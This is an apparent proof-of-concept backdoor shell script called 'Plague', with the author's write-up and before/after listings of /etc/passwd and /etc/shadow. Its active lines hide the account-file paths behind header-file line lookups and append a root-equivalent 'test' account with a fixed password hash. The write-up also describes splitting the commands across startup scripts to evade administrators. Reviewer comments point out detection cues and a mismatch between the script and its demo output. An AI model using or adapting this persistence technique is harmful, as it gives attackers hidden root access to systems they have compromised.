#!/bin.sh
# Plague Proof of Concept
# J. Oquendo
# echo @infiltrated|sed 's/^/sil/g;s/$/.net/g'
# places an account called test with the
# password test on a machine
# Scripted for Linux as a Proof of Concept
# easily modified for any nix distro
# (BSD, Solaris, QNX, etc)
#
# NOTE(review): persistence proof of concept. Net effect of the active lines
# below: an extra account named "test" is appended to the system account files
# by copying their first (root) record, carrying an md5crypt ($1$...) hash of a
# known password. Nothing here is hidden from the files themselves: every write
# is a plain append (>>), so file-integrity monitoring or an audit watch on the
# account databases (the write-up further down names Tripwire) catches it no
# matter how the path string was produced. Other detection points: a second
# UID 0 entry, and the literal hash string, which is constant across copies.
# The header-line indirection only means that grepping scripts for a literal
# "/etc/passwd" or "/etc/shadow" will not find this one; it also ties the
# script to one exact header revision (NR==59 / NR==74 are fixed line numbers,
# so a different libc release yields an empty or wrong path).
#
# Linux: take line 59, field 3 of paths.h with the quotes stripped (presumably
# the _PATH_PASSWD define -- not shown here).
file=`awk 'NR==59 {gsub(/"/,"");print $3}' /usr/include/paths.h`
# Copy the first record of that file (root's, per the listings below), set
# field 1 to "test" and print (pattern 1), then set field 2 to the hash and
# print again (pattern 2): two records are appended to the same file. Because
# the rest of root's record is kept, the new entry inherits UID/GID 0 and
# root's home and shell -- see "test:x:0:0:root:/root:/bin/bash" in the
# after-listing. NOTE(review): the write-up and listings below apply this awk
# line to the shadow file and the sed rename to passwd, the reverse of what
# is written here, so the demo output was probably not produced by this exact
# script.
sed -n '1p' $file|awk -F ":" 'BEGIN{OFS=":"}{$1="test"}1{$2="\$1\$N6M3yuA9\$JXTgD8q8apf1fgfUT44hW1"}2' >> $file
# Same indirection for the second target: line 74, field 8 of sysexits.h with
# commas stripped (presumably a comment naming the shadow path -- not shown).
file2=`awk 'NR==74 {gsub(/,/,"");print $8}' /usr/include/sysexits.h`
# Copy the first record (root's) and swap only the leading name field for
# "test"; as written, the appended entry keeps root's hash and ageing fields.
sed -n '1p' $file2|sed 's/[^:]*:/test:/' >> $file2
# FreeBSD
# NOTE(review): path again read from a header (pwd.h line 71). The awk prints
# every record twice; only output line 3 is kept. The author's own comments
# below acknowledge that pwd_mkdb would still have to be run; the rest of this
# section is left commented out and is not active.
file=`awk 'NR==71 {gsub(/"/,"");print $3}' /usr/include/pwd.h`
awk -F ":" 'BEGIN{OFS=":"}{$1="test"}1{$2="\$1\$N6M3yuA9\$JXTgD8q8apf1fgfUT44hW1"}2' $file|sed -n '3p' >> $file
# blah blah blah ...
# file2=`awk 'NR==69 {gsub(/,/,"");print $8}' /usr/include/pwd.h`
# sed -n '1p' $file2|sed 's/[^:]*:/test:/' >> $file2
# Yes I know... /usr/sbin/pwd_mkdb -p /etc/master.passwd .. boohoo
# fix=`awk 'NR==79 {gsub(/"/,"");print $3}' /usr/include/pwd.h`
# up=`awk 'NR==71 {gsub(/"/,"");print $3}' /usr/include/pwd.h`
# $fix -p $up
# Too bored to continue with the concept. If you don't get it, you don't get it.
# Solaris... You finish the rest of the work...
# NOTE(review): the Solaris section is unfinished -- it only builds two path
# strings (newt.h line 41 with "/etc/" prefixed, unistd.h line 57 with quotes
# stripped) and writes nothing.
file=`sed -n '41p' /usr/include/newt.h |awk '{print $3}'|sed 's/Fg,//g;s/^/\/etc\//g'`
file2=`sed -n '57p' /usr/include/unistd.h|awk '{print $3}'|sed 's/"//g'`
.......................................................
Plague is an odd proof of concept backdoor keeping tool based on the premise of using existing system files and commands to keep and maintain a backdoor on Linux systems. I could have modified this for BSD, Solaris, etc., but I didn't feel like doing that much work. Besides it's conceptual. The purpose behind it was to give security engineers a glimpse of the perfect backdoor if done correctly and how it would be difficult to detect. There are solely 4 lines in this shell script which add an account to a system.
To the untrained *Nix admin, these commands may be overlooked as they are unintrusive... They mention nothing that stands out. Imagine portions of this scattered throughout system scripts, compiling in the end (something like Voltron) to run either on startup or shutdown... Sure, you would see the account in the password file, but unless you dissect your machine and are CONSTANTLY running something like Tripwire, something like this would be a nightmare. For you Linux users using yum, apt-get, etc., how often do you redo your checksums?

Example script called from various files that were predefined in /etc/rc3.d/:

echo "file=`awk 'NR==59 {gsub(/"/,"");print \$3}' /usr/include/paths.h`" >> K1firstfile
echo "sed -n '1p' \$file|sed 's/[^:]*:/new_account_name:/' >> $file" >>" >> K2nextfile
echo "file2=`awk 'NR==74 {print \$8}' /usr/include/sysexits.h`" >> K3anotherfile
echo "sed -n '1p' \$file2|sed 's/[^:]*:/new_account_name:/'' >> $file2" >> K4endingfile
echo "rm $file1 $file2" >> K5lastfileremove

Each line is placed in one file in execution order, where at the end it is all re-compiled, run, then deleted... awk was too long and, to me, a bit more obvious than sed... And yes, I could have gotten the one-liner shorter had I wanted to. But what about the hash in /etc/shadow? Simple...
awk -F ":" 'BEGIN{OFS=":"}{$1="new_account_name"}1{$2="\$1\$N6M3yuA9\$JXTgD8q8apf1fgfUT44hW1"}2' This places the account "new_account_name" with the password "test" in /etc/shadow Here is the before and after on a Scientfic Linux machine [root@armada ~]# uname -a Linux armada.disgraced.org 2.6.9-34.EL #1 Mon Mar 13 11:31:17 CST 2006 i686 athlon i386 GNU/Linux [root@armada ~]# [root@armada ~]# cat /etc/shadow root://////////:13428:0:99999:7::: bin:*:13428:0:99999:7::: daemon:*:13428:0:99999:7::: adm:*:13428:0:99999:7::: lp:*:13428:0:99999:7::: sync:*:13428:0:99999:7::: shutdown:*:13428:0:99999:7::: halt:*:13428:0:99999:7::: mail:*:13428:0:99999:7::: news:*:13428:0:99999:7::: uucp:*:13428:0:99999:7::: operator:*:13428:0:99999:7::: games:*:13428:0:99999:7::: gopher:*:13428:0:99999:7::: ftp:*:13428:0:99999:7::: nobody:*:13428:0:99999:7::: dbus:!!:13428:0:99999:7::: vcsa:!!:13428:0:99999:7::: rpm:!!:13428:0:99999:7::: haldaemon:!!:13428:0:99999:7::: netdump:!!:13428:0:99999:7::: nscd:!!:13428:0:99999:7::: sshd:!!:13428:0:99999:7::: rpc:!!:13428:0:99999:7::: mailnull:!!:13428:0:99999:7::: smmsp:!!:13428:0:99999:7::: rpcuser:!!:13428:0:99999:7::: nfsnobody:!!:13428:0:99999:7::: pcap:!!:13428:0:99999:7::: apache:!!:13428:0:99999:7::: squid:!!:13428:0:99999:7::: webalizer:!!:13428:0:99999:7::: xfs:!!:13428:0:99999:7::: ntp:!!:13428:0:99999:7::: gdm:!!:13428:0:99999:7::: quagga:!!:13428:0:99999:7::: dovecot:!!:13428:0:99999:7::: postfix:!!:13428:0:99999:7::: mysql:!!:13428:0:99999:7::: sil:!!:13428:0:99999:7::: nagios:!!:13430:0:99999:7::: luzer:!!:13437:0:99999:7::: zenoss:!!:13438:0:99999:7::: [root@armada ~]# [root@armada ~]# cat /etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt 
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash nscd:x:28:28:NSCD Daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin quagga:x:92:92:Quagga routing suite:/var/run/quagga:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash sil:x:500:500:Loser:/home/sil:/bin/bash nagios:x:501:501::/home/nagios:/bin/bash alanr:x:502:502::/home/alanr:/bin/bash luzer:x:503:503::/home/luzer:/bin/bash zenoss:x:504:504::/home/zenoss:/bin/bash [root@armada ~]# ./plague [root@armada ~]# [root@armada ~]# cat /etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin 
sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash nscd:x:28:28:NSCD Daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin quagga:x:92:92:Quagga routing suite:/var/run/quagga:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash sil:x:500:500:Loser:/home/sil:/bin/bash nagios:x:501:501::/home/nagios:/bin/bash alanr:x:502:502::/home/alanr:/bin/bash luzer:x:503:503::/home/luzer:/bin/bash zenoss:x:504:504::/home/zenoss:/bin/bash test:x:0:0:root:/root:/bin/bash [root@armada ~]# [root@armada ~]# cat /etc/shadow root://////////:13428:0:99999:7::: bin:*:13428:0:99999:7::: 
daemon:*:13428:0:99999:7::: adm:*:13428:0:99999:7::: lp:*:13428:0:99999:7::: sync:*:13428:0:99999:7::: shutdown:*:13428:0:99999:7::: halt:*:13428:0:99999:7::: mail:*:13428:0:99999:7::: news:*:13428:0:99999:7::: uucp:*:13428:0:99999:7::: operator:*:13428:0:99999:7::: games:*:13428:0:99999:7::: gopher:*:13428:0:99999:7::: ftp:*:13428:0:99999:7::: nobody:*:13428:0:99999:7::: dbus:!!:13428:0:99999:7::: vcsa:!!:13428:0:99999:7::: rpm:!!:13428:0:99999:7::: haldaemon:!!:13428:0:99999:7::: netdump:!!:13428:0:99999:7::: nscd:!!:13428:0:99999:7::: sshd:!!:13428:0:99999:7::: rpc:!!:13428:0:99999:7::: mailnull:!!:13428:0:99999:7::: smmsp:!!:13428:0:99999:7::: rpcuser:!!:13428:0:99999:7::: nfsnobody:!!:13428:0:99999:7::: pcap:!!:13428:0:99999:7::: apache:!!:13428:0:99999:7::: squid:!!:13428:0:99999:7::: webalizer:!!:13428:0:99999:7::: xfs:!!:13428:0:99999:7::: ntp:!!:13428:0:99999:7::: gdm:!!:13428:0:99999:7::: quagga:!!:13428:0:99999:7::: dovecot:!!:13428:0:99999:7::: postfix:!!:13428:0:99999:7::: mysql:!!:13428:0:99999:7::: sil:!!:13428:0:99999:7::: nagios:!!:13430:0:99999:7::: luzer:!!:13437:0:99999:7::: zenoss:!!:13438:0:99999:7::: test:$1$N6M3yuA9$JXTgD8q8apf1fgfUT44hW1:13428:0:99999:7:::